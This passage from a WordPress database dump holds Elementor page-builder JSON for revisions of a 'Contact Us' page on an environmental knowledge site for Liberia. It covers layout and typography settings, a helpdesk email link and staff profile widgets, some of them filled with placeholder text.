Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14603,2317,'_elementor_edit_mode','builder'),(14604,2317,'_elementor_template_type','wp-page'),(14605,2317,'_elementor_version','2.7.5'),(14606,2317,'_wp_page_template','default'),(14607,2317,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2313,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"MEAs Officer\",\"member_description\":\"The Focal Point of the United Nations Convention on Biological Diversity\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#000000\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14609,2318,'_elementor_edit_mode','builder'),(14610,2318,'_elementor_template_type','wp-page'),(14611,2318,'_elementor_version','2.7.5'),(14612,2318,'_wp_page_template','default'),(14613,2318,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2313,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"MEAs Officer\",\"member_description\":\"The Focal Point of the United Nations Convention on Biological Diversity\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#000000\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":\"\",\"url\":\"\"},\"member_first_name\":\"Berexford S\",\"member_last_name\":\"Jallah\",\"member_position\":\"GIS Supervisor\",\"member_description\":\"The Focal Point of the United Nations Convention on Biological Diversity\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto 